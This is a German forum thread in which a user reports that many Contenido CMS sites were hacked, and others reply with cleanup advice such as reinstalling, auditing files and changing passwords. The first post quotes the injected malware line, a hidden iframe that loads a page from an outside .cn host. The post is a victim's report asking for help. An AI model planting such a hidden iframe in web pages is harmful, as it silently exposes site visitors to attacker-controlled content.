Site gehackt über include-Datei

[drive]

Hallo zusammen,

ich poste in diesem Thread, da ich nicht ganz sich bin, wo mein Problem nun besser aufgehoben wäre. Es gibt schon einige Threads zu gehackten Contenido-Installatonen.

Viele unserer Contenido-Installationen wurden gehackt, auch die Version 4.8.11 ist davon betroffen. Viele Daten wurden mit iFrames infiziert, z.B.:
<iframe src="http://greatliteautobest.cn/ts/in.cgi?mozila15" width=2 height=4 style="visibility: hidden"></iframe>

Wenn ich den schadhaften Code aus allen infizierten Daten lösche, bleibt jedoch folgendes Problem im Backende von 4.8.11: Die Navigation "Content Style Extras Statistik Administration" blendet beim MouseOver keine Subnavigation ein.

Da ich Contenido-Anfänger bin, wäre ich über Erfahrungs-Austausch u. Lösungsvorschläge sehr dankbar.

Gruß Gerrit

[Oldperl]

Hallo Gerrit,

mir ist bisher kein Fall eines Hacks in der 4.8.11er Version bekannt. Das wäre schon interessant zu wissen ob es dort geht und wenn ja wie. Ich vermute aber eher das dein Server und damit das installierte Contenido auf anderem Wege infiziert wurde.
Nun einfach ein paar Dateien wieder "reparieren" wird nicht helfen. Da sind wohl noch viele Dateien beschädigt, bzw. verändert. Ich persönlich würde Contenido komplett entfernen, neu hochladen und ein Migration Setup über die Datenbank machen. Dann noch alle Dateien vom alten cms zum Neuen und genau geschaut ob sie noch original sind.
Tja und vor allem alles was Passwort heißt ändern (FTP,MySQL, usw.)

Gruß aus Franken

Ortwin

[timo.trautmann_4fb]

Ich habe schon per PM mit ihm Kontakt aufgenommen und versuche mögliche Sicherheitslücken zu beheben, sollten sie mir unter die Augen kommen. Aber bis auf weiteres kann ich da vorest mal Entwarnung geben, da ich keine Hinweise darauf gefunden habe, dass der Hack auf Contenido stattgefunden hat, es ist ja auch denkbar, dass der Angreifer anderweitig Zugriff auf den Server erhalten hat und dadurch Contenido Dateien modifiziert wurden.